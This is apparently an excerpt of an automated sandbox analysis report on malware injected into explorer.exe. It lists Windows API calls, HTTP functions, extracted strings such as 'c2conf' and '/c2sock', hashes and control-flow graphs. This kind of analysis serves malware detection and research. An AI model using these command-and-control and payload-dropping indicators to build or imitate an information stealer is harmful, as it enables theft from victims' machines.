GetPEB lstrcmpiW 31436 8d3d11 GetCommandLineA GetCommandLineW 31379 89dc16 15 API calls ___std_exception_copy 31380 8e0c2e 42 API calls ___std_exception_copy 31439 8e2320 20 API calls __startOneArgErrorHandling 31384 8d343b 7 API calls 31341 89dc36 31342 8cecc1 16 API calls 31341->31342 31343 89dc49 31342->31343 31444 8dab4a CreateFileW 31445 8dad59 74 API calls 2 library calls 31385 8db051 32 API calls ___std_exception_copy 31447 8cc76c 49 API calls 31448 8d4d6e 75 API calls 2 library calls 31450 8d4164 RtlLeaveCriticalSection CallUnexpected 31453 8d3b7f 15 API calls 31387 8d647a 15 API calls __dosmaperr 31389 8c1473 52 API calls _unexpected
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _strlen$ComputerName$CallbackDevicesDispatcherDisplayEnumUser
                                                                                                                                                      • String ID: @5!$ @5!$$uhb$%uhb$%uhb$*y&$*y&$C: $L*Z{$L*Z{$U: $[&T!$\&T!$ge: $h5:~$i5:~$i5:~$n: $ngua$uYh$user32.dll$vYh$vYh$vYh$vYh$vYh$xFq$yFq$yFq
                                                                                                                                                      • API String ID: 1770890290-2309313597
                                                                                                                                                      • Opcode ID: 24851c02e2f64242adc694596e379bd14826af36e75dbe0f82fbd4a8385fe0ff
                                                                                                                                                      • Instruction ID: ddba5f96694a377f299503448167962b2964a83bd58c6ee1e7472c26b5818233
                                                                                                                                                      • Opcode Fuzzy Hash: 24851c02e2f64242adc694596e379bd14826af36e75dbe0f82fbd4a8385fe0ff
                                                                                                                                                      • Instruction Fuzzy Hash: F833A2B1900B01CBDB348F28C885AAAB7E5FF94704F24891EE59ADB761D771E845CB43
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 008B17CC
                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 008B17D7
                                                                                                                                                      • LoadLibraryW.KERNEL32(?), ref: 008B1922
                                                                                                                                                      • _strlen.LIBCMT ref: 008B1DD5
                                                                                                                                                      • _strlen.LIBCMT ref: 008B1DE9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _strlen$CloseCreateHandleLibraryLoadProcess
                                                                                                                                                      • String ID: @5!$%TEMP%$%uhb$%uhb$)y&$*y&$.dll$.exe$.ps1$3N(P$4N(P$L*Z{$L*Z{$UOW`$VOW`$[&T!$\&T!$\&T!$gfff$h5:~$i5:~$kz[$lz[$vYh$xFq$yFq
                                                                                                                                                      • API String ID: 1253903897-1726296848
                                                                                                                                                      • Opcode ID: ed7ab0a7ba8c0644a0fc048e3155505be7927be7559296bff38d920bea3efc00
                                                                                                                                                      • Instruction ID: 80b324162507d29843485bceeae97628469216b8047b204e0a0f31062b19aaba
                                                                                                                                                      • Opcode Fuzzy Hash: ed7ab0a7ba8c0644a0fc048e3155505be7927be7559296bff38d920bea3efc00
                                                                                                                                                      • Instruction Fuzzy Hash: 0663E9B1510B058FDF349F28C9556AAB7E1FB54314F64892FE09BCBBA0D631E9948B03
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 0089A576
                                                                                                                                                      • lstrcmpW.KERNEL32(?,008E47AE), ref: 0089A728
                                                                                                                                                      • lstrcmpW.KERNEL32(?,008E47AE), ref: 0089A9CA
                                                                                                                                                      • NtCreateFile.NTDLL(?,00100001,000000AD,?,00000000,00000000,00000007,00000001,00004021,00000000,00000000), ref: 0089B348
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcmp$CreateFilelstrlen
                                                                                                                                                      • String ID: @T>$ @T>$ @T>$ @T>$V}6F$W}6F$W}6F$ntdll.dll$J]
                                                                                                                                                      • API String ID: 2485617829-677030046
                                                                                                                                                      • Opcode ID: 8ae48622704d0198bc856efc74fc6b3ecac33538fc4490fb0ca061427f4ca74d
                                                                                                                                                      • Instruction ID: 2e7d9662e5b2e699df7d1bef966883d41855c76909a91f1db8d9d8b35e1e2559
                                                                                                                                                      • Opcode Fuzzy Hash: 8ae48622704d0198bc856efc74fc6b3ecac33538fc4490fb0ca061427f4ca74d
                                                                                                                                                      • Instruction Fuzzy Hash: 2CD2F6B1E002198BDF28AB98D9966BDBAB1FB14314F3C052AE515FB790D7318D409BD3
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 008BCE9E
                                                                                                                                                      • InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008BD1F9
                                                                                                                                                      • _strlen.LIBCMT ref: 008BD560
                                                                                                                                                      • HttpSendRequestA.WININET(?,008E6BB6,0000002F,?,00000000), ref: 008BD57C
                                                                                                                                                      • HttpOpenRequestW.WININET(?,008E5B72,?,00000000,00000000,00000000,00000000,00000000), ref: 008BD92F
                                                                                                                                                      • GetModuleHandleW.KERNEL32(?), ref: 008BD9B3
                                                                                                                                                      • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,00000000), ref: 008BE182
                                                                                                                                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 008BE24F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Internet$HandleHttpOpenRequest$AvailableCloseConnectDataModuleQuerySend_strlen
                                                                                                                                                      • String ID: @T>$ @T>$Libr$V}6F$W}6F$W}6F$aryW$c2conf$J]
                                                                                                                                                      • API String ID: 1133057487-1714174141
                                                                                                                                                      • Opcode ID: f3ec1113e0c53860d01d44a51472561dc3ca0e1f6939e8ad1ee52906a4970f23
                                                                                                                                                      • Instruction ID: ffc404716c031b4eca12eb71186b73cb5692199a62919e867a4fec7e842a9ad1
                                                                                                                                                      • Opcode Fuzzy Hash: f3ec1113e0c53860d01d44a51472561dc3ca0e1f6939e8ad1ee52906a4970f23
                                                                                                                                                      • Instruction Fuzzy Hash: 7EC2AEB1D0121D9FDF25CB98C885AFDBEB1FB15314F20462BE515EB3A0DB309A418B92
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,00000008,00000028), ref: 008B7364
                                                                                                                                                      • RtlFreeHeap.NTDLL(?,00000000,?), ref: 008B7CA2
                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 008B7CA4
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$AllocateFreeProcess
                                                                                                                                                      • String ID: BM$[&T!$\&T!$\&T!$\&T!$uYh$vYh
                                                                                                                                                      • API String ID: 3437498585-3685552436
                                                                                                                                                      • Opcode ID: 93e975e47c9cc60fd8a860efedcf5824d9d9497686e15b164a56498e116cf9a4
                                                                                                                                                      • Instruction ID: 985a4d2f99dace2518dff326257c07499313be2f8e4959e957b32e5da44f1944
                                                                                                                                                      • Opcode Fuzzy Hash: 93e975e47c9cc60fd8a860efedcf5824d9d9497686e15b164a56498e116cf9a4
                                                                                                                                                      • Instruction Fuzzy Hash: D772A37150D705DFCB289F18C9A56AEBBE0FBD5304F20881EE199CB360E634E8959B47
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • lstrcatW.KERNEL32(?,?), ref: 00893D9B
                                                                                                                                                      • lstrcatW.KERNEL32(?,00000000), ref: 00893E8B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcat
                                                                                                                                                      • String ID: #sQ$#sQ$@$@y
                                                                                                                                                      • API String ID: 4038537762-1941683038
                                                                                                                                                      • Opcode ID: 74d1154d30cfd0758bafbc27125c52e7d9f8a099ec3b3eb219b15c6ed91b0852
                                                                                                                                                      • Instruction ID: 83f7886f6513cd5483245bb6aa6692d0bb493a7ff7ea755764dc80a29f5b09da
                                                                                                                                                      • Opcode Fuzzy Hash: 74d1154d30cfd0758bafbc27125c52e7d9f8a099ec3b3eb219b15c6ed91b0852
                                                                                                                                                      • Instruction Fuzzy Hash: 81322BB19083459FDF347F68894392EBAE0FB95708F2C582EF995E6361E631C9419B03
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 3872 8a9a56-8a9a6f 3873 8a9a71-8a9a79 3872->3873 3874 8a9a7b-8a9a80 3873->3874 3875 8a9ac2-8a9ac7 3873->3875 3878 8a9b26-8a9b2b 3874->3878 3879 8a9a86-8a9a8b 3874->3879 3876 8a9acd-8a9ad2 3875->3876 3877 8a9ba4-8a9ba9 3875->3877 3880 8a9ad8-8a9add 3876->3880 3881 8a9c94-8a9c99 3876->3881 3882 8a9baf-8a9bb4 3877->3882 3883 8a9c5c-8a9c61 3877->3883 3884 8a9bfb-8a9c00 3878->3884 3885 8a9b31-8a9b36 3878->3885 3886 8a9cd8-8a9cdd 3879->3886 3887 8a9a91-8a9a96 3879->3887 3894 8a9d49-8a9d4e 3880->3894 3895 8a9ae3-8a9ae8 3880->3895 3898 8a9ebf-8a9ec4 3881->3898 3899 8a9c9f-8a9ca4 3881->3899 3896 8a9bba-8a9bbf 3882->3896 3897 8a9e42-8a9e47 3882->3897 3892 8a9e79-8a9e7e 3883->3892 3893 8a9c67-8a9c6c 3883->3893 3900 8a9e20-8a9e25 3884->3900 3901 8a9c06-8a9c0b 3884->3901 3902 8a9b3c-8a9b41 3885->3902 3903 8a9dc0-8a9dc5 3885->3903 3888 8a9f0c-8a9f11 3886->3888 3889 8a9ce3-8a9ce8 3886->3889 3890 8a9a9c-8a9aa1 3887->3890 3891 8a9d93-8a9d98 3887->3891 3930 8aa1f2-8aa201 3888->3930 3931 8a9f17-8a9f1c 3888->3931 3922 8aa0a8-8aa0d3 call 8ce96f 3889->3922 3923 8a9cee-8a9cf3 3889->3923 3904 8aa1ce-8aa1d5 3890->3904 3905 8a9aa7-8a9aac 3890->3905 3932 8a9d9e-8a9da3 3891->3932 3933 8a9f45-8a9f4a 3891->3933 3918 8aa08c-8aa090 call 8ce964 3892->3918 3919 8a9e84-8a9e89 3892->3919 3908 8a9fc9-8a9fdd 3893->3908 3909 8a9c72-8a9c77 3893->3909 3928 8aa1c2-8aa1c9 3894->3928 3929 8a9d54-8a9d59 3894->3929 3910 8a9aee-8a9af3 3895->3910 3911 8aa18f-8aa1b3 3895->3911 3926 8a9f92-8a9fb9 3896->3926 3927 8a9bc5-8a9bca 3896->3927 3916 8a9e4d-8a9e52 3897->3916 3917 8aa077-8aa087 call 8af8c0 3897->3917 3924 8a9eca-8a9ecf 3898->3924 3925 8aa1e6-8aa1ed 3898->3925 3914 8a9caa-8a9caf 3899->3914 3915 8aa02d-8aa049 call 8a369c 3899->3915 3912 8a9e2b-8a9e30 3900->3912 3913 8a9fe2-8aa00f call 8aa2c2 3900->3913 3934 8a9f5c-8a9f63 3901->3934 3935 8a9c11-8a9c16 3901->3935 3920 8a9f68-8a9f8d call 8ce964 3902->3920 3921 8a9b47-8a9b4c 3902->3921 3906 8a9dcb-8a9dd0 3903->3906 3907 8aa177-8aa18a 3903->3907 3904->3873 3938 8a9ab2-8a9ab7 3905->3938 3939 8aa265-8aa26c 3905->3939 3940 8aa271-8aa276 3906->3940 3941 8a9dd6-8a9e0c call 8ab96e 3906->3941 3907->3873 3908->3873 3959 8aa11f-8aa16e call 8a2c85 call 8a344a 3909->3959 3960 8a9c7d-8a9c82 3909->3960 3944 8a9af9-8a9afe 3910->3944 3945 8aa24d-8aa254 3910->3945 3942 8aa1ba-8aa1bd 3911->3942 3943 8aa1b5 3911->3943 3912->3873 3946 8a9e36-8a9e3d 3912->3946 3913->3873 3963 8aa206-8aa212 3914->3963 3964 8a9cb5-8a9cba 3914->3964 4012 8aa04b 3915->4012 4013 8aa050-8aa055 3915->4013 3916->3873 3947 8a9e58-8a9e74 3916->3947 3917->3873 3994 8aa095-8aa0a3 3918->3994 3919->3873 3948 8a9e8f-8a9eba call 89e28a 3919->3948 3920->3873 3949 8aa05a-8aa072 3921->3949 3950 8a9b52-8a9b57 3921->3950 3922->3873 3966 8a9cf9-8a9cfe 3923->3966 3967 8aa217-8aa248 call 89fed6 call 89dd94 3923->3967 3924->3873 3951 8a9ed5-8a9efc call 8a369c call 8a9455 3924->3951 3925->3873 3926->3942 3961 8a9fbf-8a9fc4 3926->3961 3952 8aa0d8-8aa11a call 8aaef8 call 8ceec0 3927->3952 3953 8a9bd0-8a9bd5 3927->3953 3928->3873 3971 8aa259-8aa260 3929->3971 3972 8a9d5f-8a9d64 3929->3972 3930->3873 3931->3873 3954 8a9f22-8a9f40 call 8aa2c2 3931->3954 3936 8aa1da-8aa1e1 3932->3936 3937 8a9da9-8a9dae 3932->3937 3933->3873 3955 8a9f50-8a9f57 3933->3955 3934->3873 3956 8a9c1c-8a9c21 3935->3956 3957 8aa014-8aa028 3935->3957 3936->3873 3973 8aa27e-8aa283 3937->3973 3974 8a9db4-8a9dbb 3937->3974 3938->3873 3976 8a9ab9-8a9ac0 3938->3976 3939->3873 3940->3873 3983 8aa27c 3940->3983 3999 8a9e11-8a9e1b 3941->3999 3942->3873 3943->3942 3944->3873 3978 8a9b04-8a9b21 call 8aa2c2 3944->3978 3945->3873 3946->3873 3947->3873 3948->3873 3949->3873 3950->3873 3981 8a9b5d-8a9b95 3950->3981 3951->3942 4033 8a9f02-8a9f07 3951->4033 3952->3873 3953->3873 3984 8a9bdb-8a9bf6 call 8cc990 3953->3984 3954->3873 3955->3873 3956->3873 3986 8a9c27-8a9c4c 3956->3986 3957->3873 3959->3942 4032 8aa170-8aa175 3959->4032 3960->3873 3988 8a9c88-8a9c8f 3960->3988 3961->3942 3963->3873 3964->3873 3990 8a9cc0-8a9cc4 call 8ce5b4 3964->3990 3966->3873 3992 8a9d04-8a9d26 call 8a7580 call 8a75d6 3966->3992 3967->3873 3971->3873 3972->3873 3996 8a9d6a-8a9d84 3972->3996 3973->3873 4007 8aa289-8aa2ae call 8a74f0 3973->4007 3974->3873 3976->3873 3978->3873 4003 8a9b9c-8a9b9f 3981->4003 4004 8a9b97 3981->4004 4006 8aa2b3-8aa2c1 3983->4006 3984->3873 3986->3942 4010 8a9c52-8a9c57 3986->4010 3988->3873 4024 8a9cc9-8a9cd3 3990->4024 4034 8a9d2b-8a9d44 3992->4034 3994->3873 4015 8a9d8b-8a9d8e 3996->4015 4016 8a9d86 3996->4016 3999->3873 4003->3873 4004->4003 4007->4006 4010->3942 4012->4013 4013->3873 4015->3942 4016->4015 4024->3873 4032->3942 4033->3942 4034->3873
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 008AB96E: wsprintfW.USER32 ref: 008ABA2F
                                                                                                                                                      • _strlen.LIBCMT ref: 008AA107
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _strlenwsprintf
                                                                                                                                                      • String ID: %X%H$&X%H$/c2sock$UeK$file$hwid$lid$pid
                                                                                                                                                      • API String ID: 3365003327-41233642
                                                                                                                                                      • Opcode ID: f45bcebcaaf903c9890f882eacfd6962d9610c3e55c084155e6a6d1f0bcede93
                                                                                                                                                      • Instruction ID: 2bab074d73172271d47cd94ae75da0443ec6d0f4938cd2d011e32ceab96f4397
                                                                                                                                                      • Opcode Fuzzy Hash: f45bcebcaaf903c9890f882eacfd6962d9610c3e55c084155e6a6d1f0bcede93
                                                                                                                                                      • Instruction Fuzzy Hash: 2602E3B454C3459BEB289F58C8C263EBAE4FB92314F14491FF5C6DAA61E331D9809B43
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: \&T!$\&T!$\&T!$\&T!$vYh$vYh
                                                                                                                                                      • API String ID: 0-2226890878
                                                                                                                                                      • Opcode ID: 93a100ad84c70d9199341d65824cd6708b9f7f7cc6d9e2a86c9891078080313f
                                                                                                                                                      • Instruction ID: e334adba5c37d5ba40e34b465512723f021435e4829b9c3977991db03d5f29c0
                                                                                                                                                      • Opcode Fuzzy Hash: 93a100ad84c70d9199341d65824cd6708b9f7f7cc6d9e2a86c9891078080313f
                                                                                                                                                      • Instruction Fuzzy Hash: 6762C571D0121D9BEF24DB9899856AEBBB0FB16304F284D27D516FBA50E334CE418B93
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 4485 8998ec-8998ff 4486 899901-899909 4485->4486 4487 89995b-899960 4486->4487 4488 89990b-899910 4486->4488 4489 899a35-899a3a 4487->4489 4490 899966-89996b 4487->4490 4491 8999b1-8999b6 4488->4491 4492 899916-89991b 4488->4492 4495 899a40-899a45 4489->4495 4496 899b24-899b29 4489->4496 4497 899aa9-899aae 4490->4497 4498 899971-899976 4490->4498 4499 8999bc-8999c1 4491->4499 4500 899aee-899af3 4491->4500 4493 899a7c-899a81 4492->4493 4494 899921-899926 4492->4494 4513 899c3d-899c42 4493->4513 4514 899a87-899a8c 4493->4514 4503 89992c-899931 4494->4503 4504 899b72-899b77 4494->4504 4507 899c09-899c0e 4495->4507 4508 899a4b-899a50 4495->4508 4511 899d0d-899d12 4496->4511 4512 899b2f-899b34 4496->4512 4501 899c8d-899c92 4497->4501 4502 899ab4-899ab9 4497->4502 4509 89997c-899981 4498->4509 4510 899b97-899b9c 4498->4510 4515 899bde-899be3 4499->4515 4516 8999c7-8999cc 4499->4516 4505 899af9-899afe 4500->4505 4506 899cc4-899cc9 4500->4506 4535 899f08-899f1b 4501->4535 4536 899c98-899c9d 4501->4536 4531 899abf-899ac4 4502->4531 4532 899de1-899e00 call 8cddca 4502->4532 4533 899d2f-899d50 call 8998ec 4503->4533 4534 899937-89993c 4503->4534 4517 899e4d-899e60 4504->4517 4518 899b7d-899b82 4504->4518 4537 899e05-899e16 4505->4537 4538 899b04-899b09 4505->4538 4539 899ccf-899cd4 4506->4539 4540 899f20-899f39 4506->4540 4525 899ec3-899eee call 89a30c call 8998ec 4507->4525 4526 899c14-899c19 4507->4526 4523 899dba-899dc1 4508->4523 4524 899a56-899a5b 4508->4524 4541 899d84-899d9b 4509->4541 4542 899987-89998c 4509->4542 4519 899ba2-899ba7 4510->4519 4520 899e65-899e99 call 8cddca call 8be364 4510->4520 4547 899d18-899d1d 4511->4547 4548 899f3e-899f5b lstrlenW 4511->4548 4543 899b3a-899b3f 4512->4543 4544 899e25-899e48 4512->4544 4529 899c48-899c4d 4513->4529 4530 899ef3-899f03 4513->4530 4527 899a92-899a97 4514->4527 4528 899dc6-899ddc call 8cddca 4514->4528 4521 899be9-899bee 4515->4521 4522 899e9e-899ebe call 899f88 4515->4522 4545 899da0-899db5 4516->4545 4546 8999d2-8999d7 4516->4546 4517->4486 4518->4486 4563 899b88-899b92 4518->4563 4519->4486 4564 899bad-899bce 4519->4564 4520->4486 4521->4486 4565 899bf4-899c04 4521->4565 4522->4486 4523->4486 4524->4486 4551 899a61-899a77 4524->4551 4525->4486 4526->4486 4566 899c1f-899c38 4526->4566 4527->4486 4552 899a9d-899aa4 4527->4552 4528->4486 4529->4486 4567 899c53-899c82 call 899f88 4529->4567 4530->4486 4531->4486 4555 899aca-899ade 4531->4555 4532->4486 4557 899e1d-899e20 4533->4557 4593 899d56-899d5b 4533->4593 4568 899d60-899d70 4534->4568 4569 899942-899947 4534->4569 4535->4486 4536->4486 4570 899ca3-899cb4 4536->4570 4556 899e18 4537->4556 4537->4557 4538->4486 4558 899b0f-899b1f 4538->4558 4539->4486 4571 899cda-899d08 lstrlenW 4539->4571 4540->4486 4541->4486 4572 899f60-899f65 4542->4572 4573 899992-8999ac 4542->4573 4543->4486 4560 899b45-899b6d call 8cddca * 2 4543->4560 4544->4486 4545->4486 4546->4486 4574 8999dd-899a1c call 8be364 NtCreateFile call 8be364 4546->4574 4547->4486 4549 899d23-899d2a 4547->4549 4548->4486 4549->4486 4551->4486 4552->4486 4555->4557 4582 899ae4-899ae9 4555->4582 4556->4557 4557->4486 4558->4486 4560->4486 4563->4486 4564->4557 4587 899bd4-899bd9 4564->4587 4565->4486 4566->4486 4567->4556 4606 899c88 4567->4606 4577 899d72 4568->4577 4578 899d77-899d7f 4568->4578 4569->4486 4590 899949-899959 4569->4590 4570->4557 4591 899cba-899cbf 4570->4591 4571->4486 4572->4486 4588 899f6b-899f75 4572->4588 4573->4486 4607 899a21-899a30 4574->4607 4577->4578 4578->4486 4582->4557 4587->4557 4597 899f7b 4588->4597 4598 899f77-899f79 4588->4598 4590->4486 4591->4557 4593->4557 4605 899f7d-899f87 4597->4605 4598->4605 4606->4557 4607->4486
                                                                                                                                                      APIs
                                                                                                                                                      • NtCreateFile.NTDLL(?,00120089,?,?,00000000,00000080,00000003,00000001,00000020,00000000,00000000), ref: 00899A11
                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 00899CF5
                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 00899F4B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrlen$CreateFile
                                                                                                                                                      • String ID: \&T!$\&T!$ntdll.dll
                                                                                                                                                      • API String ID: 2663515375-4147476080
                                                                                                                                                      • Opcode ID: 7ac229b122fb19c0ed34d899f95cc61cd5b4658ddcba6764224725d7ecba1851
                                                                                                                                                      • Instruction ID: 3050dd31de32c904a01b0c7a14b9b29c6638e06613efa3a2d659bcfeed6a3858
                                                                                                                                                      • Opcode Fuzzy Hash: 7ac229b122fb19c0ed34d899f95cc61cd5b4658ddcba6764224725d7ecba1851
                                                                                                                                                      • Instruction Fuzzy Hash: E9E19471D0421D9FCF34AF9CCC816ADBAB0FB15308F28055EE5A6EA350D37699809B93
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: [&T!$\&T!$vYh
                                                                                                                                                      • API String ID: 0-3973075337
                                                                                                                                                      • Opcode ID: 85c0b5d65abd85ff568d04828caf1c41fea5e04faffd6af46338f83d85fa04c5
                                                                                                                                                      • Instruction ID: 952e09a0672a2005b39156f1ef96f0dd7e86d742afa4238c67f05c1b18857c03
                                                                                                                                                      • Opcode Fuzzy Hash: 85c0b5d65abd85ff568d04828caf1c41fea5e04faffd6af46338f83d85fa04c5
                                                                                                                                                      • Instruction Fuzzy Hash: 3D22C8B1508205AFCF38BF58C98552EBBE0FB94314F28892FF196C67A0D635D9849B47
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: @T>
                                                                                                                                                      • API String ID: 0-3998906393
                                                                                                                                                      • Opcode ID: b95b6e15a1c1627dd80d73a891ffdee5f5786abfbe70e28dc915e330d0567661
                                                                                                                                                      • Instruction ID: f6a0149e7e094ed7dc5d3fd4f8dc8804a951e44adc0926d77ce9d62913e50d66
                                                                                                                                                      • Opcode Fuzzy Hash: b95b6e15a1c1627dd80d73a891ffdee5f5786abfbe70e28dc915e330d0567661
                                                                                                                                                      • Instruction Fuzzy Hash: 9E22D5719093059BEB289B58C58566E76E1FB96704F244D3FF289CBBA1D334C844AF43
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 5137 899f88-899fa8 5138 899fad-899fb2 5137->5138 5139 899fe9-899fee 5138->5139 5140 899fb4-899fb9 5138->5140 5141 89a08a-89a08f 5139->5141 5142 899ff4-899ff9 5139->5142 5143 89a049-89a04e 5140->5143 5144 899fbf-899fc4 5140->5144 5145 89a165-89a16a 5141->5145 5146 89a095-89a09a 5141->5146 5147 899fff-89a004 5142->5147 5148 89a0e0-89a0e5 5142->5148 5149 89a124-89a129 5143->5149 5150 89a054-89a059 5143->5150 5151 899fca-899fcf 5144->5151 5152 89a0c0-89a0c5 5144->5152 5157 89a289-89a28e 5145->5157 5158 89a170-89a193 5145->5158 5153 89a15b-89a160 5146->5153 5154 89a0a0-89a0a5 5146->5154 5155 89a00a-89a00f 5147->5155 5156 89a1e0-89a1ef 5147->5156 5161 89a0eb-89a0f0 5148->5161 5162 89a22f-89a252 5148->5162 5165 89a12f-89a134 5149->5165 5166 89a262-89a263 call 8998ec 5149->5166 5163 89a05f-89a064 5150->5163 5164 89a1f4-89a215 5150->5164 5167 89a1a3-89a1d0 5151->5167 5168 899fd5-899fda 5151->5168 5159 89a0cb-89a0d0 5152->5159 5160 89a225-89a22a 5152->5160 5153->5138 5154->5138 5169 89a0ab-89a0bb 5154->5169 5155->5138 5175 89a011-89a01b call 8ce964 5155->5175 5156->5138 5157->5138 5170 89a294-89a2c5 NtReadFile call 8be364 5157->5170 5158->5138 5176 89a199-89a19e 5158->5176 5159->5138 5171 89a0d6-89a0db 5159->5171 5160->5138 5161->5138 5172 89a0f6-89a11f call 8ce964 call 8be364 5161->5172 5162->5138 5180 89a258-89a25d 5162->5180 5163->5138 5179 89a06a-89a085 5163->5179 5164->5138 5178 89a21b-89a220 5164->5178 5165->5138 5173 89a13a-89a158 call 89a30c 5165->5173 5182 89a268-89a284 call 8cddca 5166->5182 5167->5138 5177 89a1d6-89a1db 5167->5177 5168->5138 5174 899fdc-899fe7 5168->5174 5169->5138 5188 89a2ca-89a2da 5170->5188 5171->5138 5172->5138 5173->5153 5174->5138 5191 89a020-89a044 call 8be364 5175->5191 5176->5138 5177->5138 5178->5138 5179->5138 5180->5138 5182->5138 5191->5138
                                                                                                                                                      APIs
